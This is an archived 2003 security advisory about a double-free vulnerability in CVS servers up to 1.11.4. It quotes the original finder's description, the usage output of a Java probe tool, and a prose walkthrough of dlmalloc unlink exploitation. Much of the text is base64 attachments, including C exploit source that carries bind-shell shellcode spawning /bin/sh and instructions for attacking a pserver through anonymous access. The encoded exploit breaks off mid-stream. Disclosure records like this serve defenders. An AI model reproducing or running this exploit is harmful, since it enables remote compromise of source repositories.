23th Jan 2003 [SBWID-5944]
COMMAND
CVS remote compromise
SYSTEMS AFFECTED
CVS <= 1.11.4
PROBLEM
Stefan Esser [[email protected]] of e-matters GmbH says :
http://security.e-matters.de/advisories/012003.html
--snipp--
While auditing the CVS sourcetree I found a flaw within the handling of
the Directory request within the server code. By sending a malformed
directory name it is possible to trigger an error condition that will
make the function return at a point where a global pointer variable is
already freed and has not got a new value assigned yet. This will
result in a classical double-free() when the next Directory request is
handled. With the help of other CVS requests it is possible to either
leak some information that could be used to determine the heap position
or to execute arbitrary code on systems that are known to be vulnerable
to this kind of bugs. This includes Linux, Solaris and most probably
Windows systems.
Additionally I was able to create proof of concept code that uses this
vulnerability to execute arbitrary shell commands on BSD servers. I was
able to achieve this because all allocated memory is aligned on BSD
systems which makes it very easy to get newly allocated memory blocks
into the same position of already freed blocks of the same slotsize. In
combination with some CVS requests that work on lists of pointers, I
was able to use this bug to free arbitrary memory addresses. With the
help of the information leak capabilities of this vulnerability it is
possible to guess the address of some strings that are needed for the
read/write access checks. Combined this allowes to bypass the write
access checks and to abuse the Update-prog/Checkin-prog requests to
execute arbitrary commands on the server with an anonymous read-only
account.
The impact of this vulnerability depends highly on the configuration of
the server. The CVS server is by default started via inetd with root
privileges. If CVSROOT/passwd is left writeable to the CVS user this
means a remote root compromise. You must also consider that chrooting
the CVS daemon may protect the rest of your system against the intruder
but will still leave the whole source tree vulnerable to the attacker.
Summarized this means that this vulnerability is a threat to most open
source projects because nearly all of them offer anonymous CVS access
to the source tree. Even if the attacker is not able to extend his
attack on the developer CVS server (if it is seperated at all) he could
still backdoor everything other people download from the anonymous
server.
Update (25 January 2003)
======
Joe Testa [[email protected]] provides a java test program :
Here is how this tool works:
[jdog@wonderland jdog]$ java CVSProber 192.168.1.5 jdog chad0wnzme /cvs
Connecting...connected.
Server responded with 'ok', which means that it is not vulnerable.
Probe completed.
[jdog@wonderland jdog]$ java CVSProber 192.168.1.7 anonymous /cvs
Connecting...connected.
Server killed the connection and thus appears to be vulnerable!
Probe completed.
[jdog@wonderland jdog]$
--0__=0ABBE62BDFC579128f9e8a93df938690918c0ABBE62BDFC57912
Content-type: application/octet-stream;
name="CVSProber.tar.gz"
Content-Disposition: attachment; filename="CVSProber.tar.gz"
Content-transfer-encoding: base64
H4sICEJXMT4AA0NWU1Byb2Jlci50YXIA7Rr9U9tGNr/Wf8WDycWG2MY2GIgpbQmhKb0AKR9J79JM
RkhrW7GkVXclDGnzv997u5KltZaP3EzuJjPeycRYfvu+v/Zp99+cvRb8kon2R+fKefRVVqfb6Wx2
Oo86uLY2N4zPTqfX7/c2H+GD7kav3+uubyF8r4fg0Pk67JgrlYkjAB599PjoLrj7fv9G19rqag1W
4XzsS4gFHwknhITJRIID+2/OQDJxxQQkHP9i4A/BT8B1IrhkkAjfnTAP/Ah/dZ0g8KMR4aI1FIw1
VoBHiCZkIRc3cBlwdwLJ1HdZG+AXJhCdhGTM4NKRvkt/ERgfAo+ZcBKfR4McXbe9gog0nGB/psgg
bR76Av+QLEqIQUKl2W2CpK8OAqEgdc8XHyInZPUcHa0rR/jOZaCYkCyBBslHKAhcTv3EHddhmEYu
MYIyZqjb7ko7R9NTXJX4CR2PQSpRDwoTImJugkI1od5eqzdhOvbdMaoqlUyWeSk4JDlQtVp9HiAb
Y54m+IhwCtYiTi/ZkAuTT99AF7BhMmNyXTFZRy9PUlmvcEumCxhGQKG9ugQmBBcwDJyRnCHaIEQR
RzhRtQThauLPHuSiKPsoMdBFtNVzTH3EJBMWS+i2NsBBWQSLmZMwT6PIfI5cKscBKDKKsZqMfeGt
QuKHrCwxWqjQIdHR/+BQ+TIxQP7tjBw/Qn61Z8cZGZFGEWkXcbzyo/QaGucCk4J/jV7Xb2qD5LTY
teMmK+i+h+DxqJ7AJOJTigqFf8rFpKCy+vzsRRP2Dn9vAvKu9XZxfPh7jks5YJRIxPZC8BjDBBnD
GMKPBL7/SIw7Pwkn9r2ttsvDH5RqArQ/AiqyU3TwHNnYiWMWSRICCUkGceAkqLOQ0J+PnWgilzKd
nIy1lieMxeTXoY9f0DMxFALOJ6QKZEAJ5HLyEIqjw/oVQyIeRByVgPHps8idqYXcVDmQ0qvgCXd5
AGmU+AGlDUKJaWMoeAgHpAfmBMjWmQpZtD55gOSFRacMjQyxIygLIXNad+kowCRCAe0InkZeu50Z
Gs3mouxoZXzKtCe/PL6A1+llgF6a/QpXvXZnqXCNn5wUY0sQvV85g3NSd/4TuoWkqAd4fOgNSKpS
jWxeoWNsAFao9bVOd623Ad2NQb8/6PeAagQcXMfwuKBzyq58QiYHZYcl1K/4yIL78RxYvl8RtVJV
ZOd27Xke6iOkPIG+E2KGlE3UqJToox6g/hJ0tFx/dmrrJWrr0OsNeuuD7raV2j5mkCjFeH6CuRtj
0/+k0re8m0BvnkBnfdDbtBI4RnfPczH6zp1ouwbaLuLsDvp2tIeRn/hOgOlH79Z412o1P4y5SIBM
0o5Y0j7D0sWSHeO5z9uvBda+t8JPmKj89jwdDtG5vVOGqbH682EUp8lZgqEQ3gZxcnDtsphE3qnV
Yu3MboA2LJwG/qrVaiRJ9jNlefzQ7GJMqY9diNIg2LHAlfjHsC3+vn2HKRVcml9v34eSUhZwr+Qp
5wVLNuavuI+eizm0ke9yxEi+ew8rM2lpra3B69yfMVXxeOYb2cKs3FBb2wGLRpiglnZhHZ48mX+2
oRCX3eLsBmtG2MYi2FZaCZCV5QvpjNgAlHlKBjh8/cHxPMHQKgEfYTpdhqdgYLOt5Xd5LL4nnXwQ
qJQ/omVY2bmfkYNrJ4wDCyvdZ712d3O7jWVLZyJk5X5OXMzqnWn06YjBGrLyMB6Kn+/g4UHksaOI
bkKeyrupX/tJAzY3N8u/fy55Q+YpfryXGWNXew104P3OPJRqT3KArgVglijLDk2r4lO75FPz/lN4
uSbRK5OgVcK/vLe8kz1Fj97DLhlrta6jJe+WmBuw+tX36oV/fwYWYFm7m/T6HaRdHmGhS/IoahTc
zmt59iXBBv2vms1CWFG0f6B37PMowsYXNYk1umLSIiuxaZapGoXhmtDb6HRvcYMZEeWEribDPE3D
ZGsunSGpUrJrZEy0Ryw5SZNZJm6sYL8nUjZPvprmEJ+ZChvqWSWrN6wRUFAvbcAmd6Uqh0oqDeWy
pQI+x5+PdaxR2erxk/wghdpqLzdhGVs3bKhaIffSgOloMxGRfy9h3/2Sc48YqrAvx2ni8alKROqQ
oDtHjZhiJ8O9VEU+x8/aLQyVt8w4eYBs+oRTQWHaro2a9rDNZ415FSrJbwVu41HHCSTS0kcjTG73
aCc7XXi+R+cEwZJU4GE4yo5W0zGLqCeWeLwLPGyulyw+/DADfvclivqKSv/u29P2f6EoMy3pckFH
NUwKXyK73qLLS6V+KNS2jHempZz4QaDOtNTc61RLg5aIHmEhfUjdpbVMZ0ZHyGzmcJUGESrgMsi0
UwbNas2M9cJAfKJs84USYKaPeURHFHV0rPPJbDryYO5DPHPIfMpDRTLCulcIUS081oJJCwuvOt9G
LJsHgOMKLmV2CHZwk5cqS4c3Snz6Mz/z2rDR4sOh79LhopiiqRPrQ7S0N6Sy5XIh0hhFoxoBU0eq
SVczH488WFE6GrIhyADq1KEq/3sKy3U8h78d84cjo8mDVKMH+EC6/wDKDhaXKfcNn1GLiTtuwOxI
A+xhbfdsw0B11oyK5hH2CdiMN1aMPgWGPvb/wc0c1lKSUD0qnYexfZ61DWV+y5/l00hWhLNwV9+a
lV5xBfUrSDmlg5txYplS74FsPD94eXgMexfnv8DpwW8XB2fnBiMZWN7JVX/R54zqc1t3kNM8OH5R
pTjf9gb8iskjdiJe6T+O+QPTmk7nlu1FnjiEVydvDuBfJxfVXF4y0TFXXOhZUTGSXLrDQZcbKkxL
6YD2aSUNHWxOvPZKqbja7Kv7p1vsN6ckTF1pkFROBrmilc3IU0v2Mw6tatLuZyGkOGUjP/FDJ9Hj
MzfwaZ6Noe7JcsLICbxxAt9r6QQqGR58J1mRy39QM1kJ+2NG0/kWauGYTVuIE3t39VCmIezz+KY1
pM7tIvZo8gr7Qk1gs+8tPHHpPHfExAgfv6b4xc9TV7Y8fziEI5oN4n8tmsXCKQvRbF72mVE7Y0lL
q7k1G4WrWZGoPtawvjspINSXcxbSKJMpAJfY96MWvahQD1LNrPqO7uYPfeThSJXrlireaib0VlCl
Ey3hyhNt1iM4usRsgXQP4Gc4ysKhGqpXhk7NoEFbUkhk3qY9Q9kEnqhnTPfDVNvmhhKN22Oq1BP8
/fftnfgtXbiv51n+JyS8VJYpd/rC/yRKpEaD2DZkYUNioj30S5AXuWXq2WsM/4plJTrHpOSRgMkY
zU2VTr2DwSd5EfYDP7nRsmNCvyIrlqPO6Liy6Cq9MslHRppHS/tnXXfHcG7XmXQqVAsv/JI0PGNs
p6JjFceGbtWIO3VdVNYwDfIGtfCNOf1cck4j1aIV/8Lc9NCcrTdUujlD1RmvdC4udlMnZYMaIh5m
UchMGXz2niBrY1BEChV6E9G57ji3u0um9kxUqT/KPUTpyJ+PInKonbuAlv/o9pZvgxkGqRzneitJ
pKYJ4OimA4uP6kiaJFyEKZxLHUbZrOMJMYJHfP06A9GGuCtht8taxHcmbkZAz0BnVrf0jjPAUqZS
pi4PRJbyJGOYUA13DOGVICj8rf3bZ5PG3JzkLjJzHvqllDLF3kUhG7I8APO8QivTxlkvSyeF7Jgw
oXmPim105rosuq+xI8dqah2MOKpxHKrWnd5cylUInJDlVX3O8LN8NzeVy54jrpHytRVr4CdY/rNx
4uxHd+wIiKehE797nw2t6NE76PU3aS5YOLyCgfpSHQiwQVAr3V5npwLxx3IZpL9ehfiHgaPzrArx
pAyx1bMQqZs4tqsgDQOHhdGVMsDmRhVg1cCwWQV4amDYqgI0DS67FhQtg4aFibZBwyLnWhlg28JE
x2SiW4XoGhazqLtncNmvAqybNCwm3ShDbFgA+mWAdYsmNg1BLVxuGQAWObfLAM8sYjwzlG0BGJhy
WpjYMZiwWPx7E4XForsmhMV1fzCj0MLGj2Z8WETZM4xu8ZvnhiSWON43TGoBeGEAWHRxYHJpkeNn
A4VFFS8NLi1+9YvhVxZ1H5pMWOT41WDCost/Grq0cPnKwGCR88i0qIWJY8N5Ld59Yghq4fK1ScMC
8ZshhwXg1ACwBOmZEUEWk5+bTFhQXJgQFhxvDC4sNn9rqNvi278byrTY419GxrNo+99mkFp09cHg
0iKGYwpqIXJpErEI4prOa1GnZ0JYqDATwuK+Q8OqFoWPDHVZvHdsKNyCwTdIWDB8NDBYBJ0YABYM
gREgFh5CA8Ci7chg0qJKbjieJdnEhlNYAP40TW4RQxhcWnxXGoqwmDMxuLSoMjUwWLi8MhRhITE1
5LRo6tqQwiLmjcGDxRifDB56xnRmyEWDbp2CjxCdHfz4ftYeZy/mqeH3nz6tzJizRvnpLp2INKnZ
TiK1R++icdf8K/DSfjrmajTF4eBzfuzX1yBq/+9bvQ9f2XmxnVwnX43G3fe/O93+Zje//72+vo5w
mAw7vcX97//Fqr0UjNGgV7ZaWYjtJYmjZr35PI+1QscP4IandTxrD+m+qAO/0sWf/Ma4fnUXk/NL
cGrl67V0cZdGIYK5NNf2eHoZsFZ2q9cyKVRv4rJbu36ib5Dre7mOcMd+wlyMQIbPg5sdApjSK116
fxmm7rjmxDES8tUk2x9CzHgcsAxGCRHSdXN3ol/f0WXSmAm6J+tELsvGYbJmucLLEpfO7YrF/O76
mE+1ghLOA337d4A6fEeu8tOU3m+KgAY+9P3943uva+U3sUJ9E6tmXKMpLrvU7n+Het+r0dr8m7Av
53kLzJtb93F7zzvrW19FP5zVzHvfcoFA+u9WcbW3Cad0lRq2mnAYudrVxkkSD9bW4lHcDv2kzbx0
gDV5q7sWT+Qa3YVO4x95vDtiyRPJyPt2O9ed3vNOZ3v9mY6U7kYfnnf729Db39uCTmevB8/3DrYB
Nva629DfOuhDd/ugA7QL1LZvqDQs1mIt1mIt1mIt1mIt1mIt1mIt1mIt1mIt1mIt1mIt1mIt1mIt
1mIt1je2/gM5x/KVAFAAAA==
--0__=0ABBE62BDFC579128f9e8a93df938690918c0ABBE62BDFC57912
Content-type: application/octet-stream;
name="CVSProber.tar.gz.sig"
Content-Disposition: attachment; filename="CVSProber.tar.gz.sig"
Content-transfer-encoding: base64
iD8DBQA+MVgjV+UY4AKwCDkRAuYIAJ9ZMDgY+u9FxBjDJlvfMgtyaJFqhQCfdrr0OuwtuXaUOLp4
kgx3O2oUirw=
--0__=0ABBE62BDFC579128f9e8a93df938690918c0ABBE62BDFC57912--
Update (03 February 2003)
======
Exploit by Igor Dobrovitski [[email protected]] :
A bug in cvs versions up to and including 1.11.4 was recently found
where, under certain conditions, a pointer is free()'d, and then
free()'d again without being re-initialised. The reports with regards
to the exploitability of the condition in question range from - "it is
a classical exploitable double-free()" to "may possibly be exploited".
I have written an exploit for Linux for pserver, and contrary to my
usual practice, decided to make it public. First, I couldn't find any
papers on the internet that would explain the exploitation techniques
of double-free(), and I believe we don't have many publically available
exploits or in-depth discussion on the matter. I hope that this little
explanation that I've put together, and the exploit itself may be
somewhat useful to the hacker/security community (we can't exist
without each other, can we? :) The impact of a successful exploitation
is not that great: an unprivileged access to the system, where your
calls to getuid() will return a number that's far from 0 (cvs drops
provileges, and does it right). The audience is expected to be familiar
with D.L. malloc implementation. The explanation of how D.L. malloc
works can be found in two articles in phrack 57.
If a request for a memory chunk is made, and if chunks that are kept in
linked lists, or the last remaindered chunk cannot satisfy the
requirement, the top memory chunk is split off, and a chunk of the
right size is returned to malloc(). When this chunk is later free()'d,
it may be coalesced with other adjacent chunks if any of the adjacent
chunks are free. If not, the chunk is placed in a linked list. After
being processed by the frontlink() macro, the linked list looks like
this: we have two items in the list, the bin and the chunk, both BK and
FD pointers of the bin point to the chunk, and both BK and FD pointers
of the chunk point to the bin. Now, should this chunk be free()'d
again, while on the linked list, the picture changes. After the second
free() is called and the chunk is processed by the frontlink() again,
we have both BK and FD pointers of the bin still pointed at the chunk,
but both BK and FD pointers of the chunk will point to itself !!! Take
a look now at the unlink() macro. This macro is called when taking a
chunk off the list:
#define unlink( P, BK, FD ) { \
BK = P->bk; \
FD = P->fd; \
FD->bk = BK; \
BK->fd = FD; \
}
Remember that we have now P = P->bk = P->fd. What changes when this
chunk is passed though unlink()? Nothing! This means that ALL
subsequent calls to malloc of the size our chunk will be returning the
same chunk, the one that was double-free()'d. The rest is easy. After
the chunk was double-free()'d, we make a request to the program that
will have to allocate the double-free()'d chunk back to us, and copy
the data we supply into the memory returned to us. Well, since the
chunk is allocated, the backward and forward pointers are not used, and
user data gets straight there. We will copy 2 addresses into the first
8 bytes of the chunk. Now, we make another request to the program that
will have to allocate to us the same chunk. It will be passed through
the unlink() again, but this time, since the chunk is considered free,
its BK and FD pointers are used, and lo and behold! We can overwrite
any address in the memory with 4 bytes of our choosing.
Now, how this particular exploit works:
1. First we allocate a chunk of some size and make sure this chunk comes from the top memory chunk. Also make sure that this chunk stays allocated while we're
exploiting. This will keep our directory chunk from being coalesced
with the previous chunk.
2. Allocate the Directory chunk, make sure it comes from the top memory chunk.
3. Allocate a chunk the same size as in step 1, for the same reason,
except that it will keep our Directory chunk from being coalesced with
the next chunk.
4. Now that our exploitable chunk is secure, allocate a big chunk for
us to put shellcode, jumps and noops, 4K in this exploit.
5. free() our directory chunk twice.
6. Ask the server to malloc() a chunk of the size that was
double-free()'d, it will give us the very same double-free()'d chunk
without actually taking it off its linked list;
7. the server will strcpy() our 2 addresses we provide into the first 8
bytes of our double-free()'d once malloc()'ed chunk.
8. Ask the server to again malloc() a chunk of the size that was
double-free()'d, upon which again our chunk is malloc()'ed, passed
through unlink(), overwriting memory.
--8323328-300904865-1044185243=:1636
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="cvs_sploit.c"
Content-Transfer-Encoding: BASE64
Content-ID: <[email protected]>
Content-Description:
Content-Disposition: attachment; filename="cvs_sploit.c"
LyoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqLw0KLyogRXhwbG9pdCBmb3IgQ1ZTIGRvdWJsZSBmcmVl
KCkgaW4gZGlyc3dpdGNoKCkgZm9yIExpbnV4IHBzZXJ2ZXIgKi8NCi8qIFVz
YWdlIGluc3RydWN0aW9uczoNCkFueSBhY2Nlc3MgdG8gdGhlIHBzZXJ2ZXIg
d2lsbCB3b3JrLCBhbm9ueW1vdXMgaXMgZW5vdWdoLg0KVGhlIGV4cGxvaXQg
dHJpZXMgdG8gYmluZCB0byBwb3J0IDMwNDY0IG9uIHRoZSB0YXJnZXQgYW5k
IGV4ZWMgYSBzaGVsbCBvbiBjb25uZWN0aW9uLA0KSXQgd2lsbCBjb25uZWN0
IHRoZXJlIGl0c2VsZiBhbmQgcGFzcyBjb250cm9sIHRvIHlvdSBpZiBpdCBz
dWNjZWVkcy4gQWNjaWRlbnRhbGx5LCB0aGlzIG1lYW5zIHRoYXQNCmlmIHRo
YXQgcG9ydCBpcyBmaXJld2FsbGVkLCB0aGUgZXhwbG9pdCB3aWxsIGZhaWwu
DQpIZXJlJ3Mgd2hhdCB5b3UgbmVlZCB0byBkbzoNCiAgIDEuIENvbXBpbGUg
dGhlIHByb2dnaWU6IGdjYyAtbyBzcGxvaXQgdGhpc19maWxlLmMNCiAgIDIu
IE1ha2Ugc3VyZSB0aGUgdGFyZ2V0IGlzIHJ1bm5pbmcgTGludXgsIHVzZSBu
bWFwIC1PLCBpdCB3b24ndCB3b3JrIHVubGVzcyBpdCdzIGEgTGludXgNCiAg
IDMuIFJ1biB0aGUgcHJvZ2dpZTogLi9zcGxvaXQgLXIgcmVwb3NpdG9yeSAt
dSB1c2VyIFsgLXAgcGFzc3dvcmQgaWYgbm90IGVtcHR5IF0gdGFyZ2V0X2hv
c3QNCiAgIDQuIExvb2sgZm9yIG91dHB1dCwgaWYgdGhlIGV4cGxvaXQgZG9l
c24ndCB3b3JrOg0KICAgICBhLiBJZiBhZnRlciByZWFkanVzdGluZyBpbiBt
ZW1vcnkgKCB5b3Ugd2lsbCBiZSB0b2xkIHdoZW4gaXQgaGFwcGVucyApIHRo
ZSBmaWd1cmVzIHRoYXQgeW91IHNlZQ0KICAgICAgICAocmV0dXJuIGNvZGVz
KSBhcmUgMydzLCBhbmQgbm90aGluZyBlbHNlLCB0d2VhayB0aGUgLWogcGFy
YW1ldGVyLCB0aGUgZGVmYXVsdCBpcyA3LCBidXQNCiAgICAgICAgSSBoYWQg
dG8gdXNlIDAgb24gYSBkZWJpYW4gY3ZzIDEuMTEuMSwgaXQgd29ya2VkIGlu
IHRoZSBlbmQsIHlvdSBtaWdodCBldmVuIHRyeSBsb3cgbmVnYXRpdmUgaW50
ZWdlcnMNCiAgICAgYi4gSWYgYWZ0ZXIgcmVhZGp1c3RpbmcgeW91IHNlZSBu
b3Qgb25seSAzJ3MgYnV0IDAncywgb2NjYXNpb25hbGx5IC0yJ3MgYW5kIG90
aGVycywNCiAgICAgICAgYnV0IDAncyBhcmUgb2YgaW50ZXJlc3QsIHRoZW4g
Y2hhbmNlcyBhcmUgdGhlIC1qIGlzIGNvcnJlY3QsIHRoZW4gc2V0IHRoZSAt
cyB0byA0LA0KICAgICAgICBzZXR0aW5nIGl0IHRvIDQgbWVhbnMgaXQgd2ls
bCBicnV0ZWZvcmNlIGZvciBsb25nZXIsIGJ1dCB3aWxsIHRyeSBldmVyeSBh
ZGRyZXNzDQogICA1LiBJZiBzdWNjZXNzZnVsLCBjbGVhbiB1cCB0aGUgbWVz
cyBhZnRlciB5b3Vyc2VsZjogcm0gLXJmIC90bXAvY3ZzKg0KICAgNi4gRW5q
b3kgaXQgZXZlbiBpZiB5b3UgZG9uJ3QgYnJlYWsgaW4gYW55d2hlcmUgOikN
CiovDQoNCg0KI2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RkbGli
Lmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8c3lzL3RpbWUu
aD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxuZXRkYi5o
Pg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxuZXRpbmV0
L2luLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8ZXJybm8u
aD4NCiNpbmNsdWRlIDxzaWduYWwuaD4NCg0KLyoNCkV4cGxvaXQgYnkgSWdv
ciBEb2Jyb3ZpdHNraSwgSmFudWFyeSAyMDAzDQoNCkFuZCBJIGdhdmUgbXkg
aGVhcnQgdG8ga25vdyB3aXNkb20sIGFuZCB0byBrbm93IG1hZG5lc3MgYW5k
IGZvbGx5OiBJIHBlcmNlaXZlZCB0aGF0IHRoaXMgYWxzbyBpcyB2ZXhhdGlv
biBvZiBzcGlyaXQuDQpGb3IgaW4gbXVjaCB3aXNkb20gaXMgbXVjaCBncmll
ZjogYW5kIGhlIHRoYXQgaW5jcmVhc2V0aCBrbm93bGVkZ2UgaW5jcmVhc2V0
aCBzb3Jyb3cuDQoqLw0KDQojZGVmaW5lIE5NICJPdXQgb2YgbWVtb3J5Ig0K
DQp2b2lkIHVzYWdlKHZvaWQpOw0Kdm9pZCBkaWUoY29uc3QgY2hhciopOw0K
Y2hhciogeXN0cmR1cChjb25zdCBjaGFyKik7DQppbnQgY29ubmVjdF90b19o
b3N0KGNoYXIqLCBpbnQsIGludCosIGludCopOw0KaW50IGF1dGhlbnRpY2F0
ZShjaGFyKiwgY2hhciosIGNoYXIqLCBpbnQsIGludCk7DQpjaGFyKiBzY3Jh
bWJsZShjaGFyKik7DQppbnQgdGFsayhjaGFyKiwgaW50KTsNCmludCBnZXQo
Y2hhciosIGludCwgaW50KTsNCnZvaWQgZG9uZShjaGFyKiwgaW50KTsNCg0K
c3RhdGljIGNoYXIgKnByb2duYW1lOw0Kc3RhdGljIGludCB0aW1lb3V0ID0g
MTsgLyogdGltZW91dCBvbiBzZWxlY3QoKSBvbiByZWFkKCkgaW4gc2Vjb25k
cyB3aGVuIHJlYWRpbmcgZnJvbSB0YXJnZXQgKi8NCnN0YXRpYyBjaGFyIHNo
ZWxsY29kZVtdPQ0KDQovKiBJIGdyYWJiZWQgdGhpcyBzaGVsbGNvZGUgZnJv
bSBzb21lb25lJ3MgZXhwbG9pdCwgdGhhbmtzIGhlYXBzIHRvIHdob2V2ZXIg
d3JvdGUgdGhpcyBtb25zdGVyLCBzYXZlZCBtZSBoZWFwcyBvZiB0aW1lIG9u
DQogICBhIGZldyBvY2Nhc2lvbnMgOikNCiovDQovKiBwb3J0IGJpbmQgdGNw
LzMwNDY0ICoqKi8NCi8qIGZkID0gc29ja2V0KEFGX0lORVQsIFNPQ0tfU1RS
RUFNLCBJUFBST1RPX1RDUCkgKi8NCiJceDMxXHhjMCIgLy8geG9ybCAlZWF4
LCVlYXgNCiJceDMxXHhkYiIgLy8geG9ybCAlZWJ4LCVlYngNCiJceDMxXHhj
OSIgLy8geG9ybCAlZWN4LCVlY3gNCiJceDMxXHhkMiIgLy8geG9ybCAlZWR4
LCVlZHgNCiJceGIwXHg2NiIgLy8gbW92YiAkMHg2NiwlYWwNCiJceGIzXHgw
MSIgLy8gbW92YiAkMHgxLCVibA0KIlx4NTEiIC8vIHB1c2hsICVlY3gNCiJc
eGIxXHgwNiIgLy8gbW92YiAkMHg2LCVjbA0KIlx4NTEiIC8vIHB1c2hsICVl
Y3gNCiJceGIxXHgwMSIgLy8gbW92YiAkMHgxLCVjbA0KIlx4NTEiIC8vIHB1
c2hsICVlY3gNCiJceGIxXHgwMiIgLy8gbW92YiAkMHgyLCVjbA0KIlx4NTEi
IC8vIHB1c2hsICVlY3gNCiJceDhkXHgwY1x4MjQiIC8vIGxlYWwgKCVlc3Ap
LCVlY3gNCiJceGNkXHg4MCIgLy8gaW50ICQweDgwDQoNCi8qIHBvcnQgaXMg
MzA0NjQgISEhICovDQovKiBiaW5kKGZkLCAoc3RydWN0IHNvY2thZGRyKSZz
aW4sIHNpemVvZihzaW4pICkgKi8NCiJceGIzXHgwMiIgLy8gbW92YiAkMHgy
LCVibA0KIlx4YjFceDAyIiAvLyBtb3ZiICQweDIsJWNsDQoiXHgzMVx4Yzki
IC8vIHhvcmwgJWVjeCwlZWN4DQoiXHg1MSIgLy8gcHVzaGwgJWVjeA0KIlx4
NTEiIC8vIHB1c2hsICVlY3gNCiJceDUxIiAvLyBwdXNobCAlZWN4DQovKiBw
b3J0ID0gMHg3NywgY2hhbmdlIGlmIG5lZWRlZCAqLw0KIlx4ODBceGMxXHg3
NyIgLy8gYWRkYiAkMHg3NywlY2wNCiJceDY2XHg1MSIgLy8gcHVzaGwgJWN4
DQoiXHhiMVx4MDIiIC8vIG1vdmIgJDB4MiwlY2wNCiJceDY2XHg1MSIgLy8g
cHVzaHcgJWN4DQoiXHg4ZFx4MGNceDI0IiAvLyBsZWFsICglZXNwKSwlZWN4
DQoiXHhiMlx4MTAiIC8vIG1vdmIgJDB4MTAsJWRsDQoiXHg1MiIgLy8gcHVz
aGwgJWVkeA0KIlx4NTEiIC8vIHB1c2hsICVlY3gNCiJceDUwIiAvLyBwdXNo
bCAlZWF4DQoiXHg4ZFx4MGNceDI0IiAvLyBsZWFsICglZXNwKSwlZWN4DQoi
XHg4OVx4YzIiIC8vIG1vdmwgJWVheCwlZWR4DQoiXHgzMVx4YzAiIC8vIHhv
cmwgJWVheCwlZWF4DQoiXHhiMFx4NjYiIC8vIG1vdmIgJDB4NjYsJWFsDQoi
XHhjZFx4ODAiIC8vIGludCAkMHg4MA0KDQovKiBsaXN0ZW4oZmQsIDEpICov
DQoiXHhiM1x4MDEiIC8vIG1vdmIgJDB4MSwlYmwNCiJceDUzIiAvLyBwdXNo
bCAlZWJ4DQoiXHg1MiIgLy8gcHVzaGwgJWVkeA0KIlx4OGRceDBjXHgyNCIg
Ly8gbGVhbCAoJWVzcCksJWVjeA0KIlx4MzFceGMwIiAvLyB4b3JsICVlYXgs
JWVheA0KIlx4YjBceDY2IiAvLyBtb3ZiICQweDY2LCVhbA0KIlx4ODBceGMz
XHgwMyIgLy8gYWRkYiAkMHgzLCVibA0KIlx4Y2RceDgwIiAvLyBpbnQgJDB4
ODANCg0KLyogY2xpID0gYWNjZXB0KGZkLCAwLCAwKSAqLw0KIlx4MzFceGMw
IiAvLyB4b3JsICVlYXgsJWVheA0KIlx4NTAiIC8vIHB1c2hsICVlYXgNCiJc
eDUwIiAvLyBwdXNobCAlZWF4DQoiXHg1MiIgLy8gcHVzaGwgJWVkeA0KIlx4
OGRceDBjXHgyNCIgLy8gbGVhbCAoJWVzcCksJWVjeA0KIlx4YjNceDA1IiAv
LyBtb3ZsICQweDUsJWJsDQoiXHhiMFx4NjYiIC8vIG1vdmwgJDB4NjYsJWFs
DQoiXHhjZFx4ODAiIC8vIGludCAkMHg4MA0KDQovKiBkdXAyKGNsaSwgMCkg
Ki8NCiJceDg5XHhjMyIgLy8gbW92bCAlZWF4LCVlYngNCiJceDMxXHhjOSIg
Ly8geG9ybCAlZWN4LCVlY3gNCiJceDMxXHhjMCIgLy8geG9ybCAlZWF4LCVl
YXgNCiJceGIwXHgzZiIgLy8gbW92YiAkMHgzZiwlYWwNCiJceGNkXHg4MCIg
Ly8gaW50ICQweDgwDQoNCi8qIGR1cDIoY2xpLCAxKSAqLw0KIlx4NDEiIC8v
IGluYyAlZWN4DQoiXHgzMVx4YzAiIC8vIHhvcmwgJWVheCwlZWF4DQoiXHhi
MFx4M2YiIC8vIG1vdmwgJDB4M2YsJWFsDQoiXHhjZFx4ODAiIC8vIGludCAk
MHg4MA0KDQovKiBkdXAyKGNsaSwgMikgKi8NCiJceDQxIiAvLyBpbmMgJWVj
eA0KIlx4MzFceGMwIiAvLyB4b3JsICVlYXgsJWVheA0KIlx4YjBceDNmIiAv
LyBtb3ZiICQweDNmLCVhbA0KIlx4Y2RceDgwIiAvLyBpbnQgJDB4ODANCg0K
LyogZXhlY3ZlKCIvL2Jpbi9zaCIsIFsiLy9iaW4vc2giLCBOVUxMXSwgTlVM
TCk7ICovDQoiXHgzMVx4ZGIiIC8vIHhvcmwgJWVieCwlZWJ4DQoiXHg1MyIg
Ly8gcHVzaGwgJWVieA0KIlx4NjhceDZlXHgyZlx4NzNceDY4IiAvLyBwdXNo
bCAkMHg2ODczMmY2ZQ0KIlx4NjhceDJmXHgyZlx4NjJceDY5IiAvLyBwdXNo
bCAkMHg2OTYyMmYyZg0KIlx4ODlceGUzIiAvLyBtb3ZsICVlc3AsJWVieA0K
Ilx4OGRceDU0XHgyNFx4MDgiIC8vIGxlYWwgMHg4KCVlc3ApLCVlZHgNCiJc
eDMxXHhjOSIgLy8geG9ybCAlZWN4LCVlY3gNCiJceDUxIiAvLyBwdXNobCAl
ZWN4DQoiXHg1MyIgLy8gcHVzaGwgJWVieA0KIlx4OGRceDBjXHgyNCIgLy8g
bGVhbCAoJWVzcCksJWVjeA0KIlx4MzFceGMwIiAvLyB4b3JsICVlYXgsJWVh
eA0KIlx4YjBceDBiIiAvLyBtb3ZiICQweGIsJWFsDQoiXHhjZFx4ODAiIC8v
IGludCAkMHg4MA0KDQovKiBleGl0KCVlYngpICovDQoiXHgzMVx4YzAiIC8v
IHhvcmwgJWVheCwlZWF4DQoiXHhiMFx4MDEiIC8vIG1vdmIgJDB4MSwlYWwN
CiJceGNkXHg4MCI7IC8vIGludCAkMHg4MA0KDQoNCg0KaW50IA0KbWFpbiAo
aW50IGFyZ2MsIGNoYXIgKiphcmd2KQ0Kew0KICBpbnQgaSwgYywgZmRfaW4s
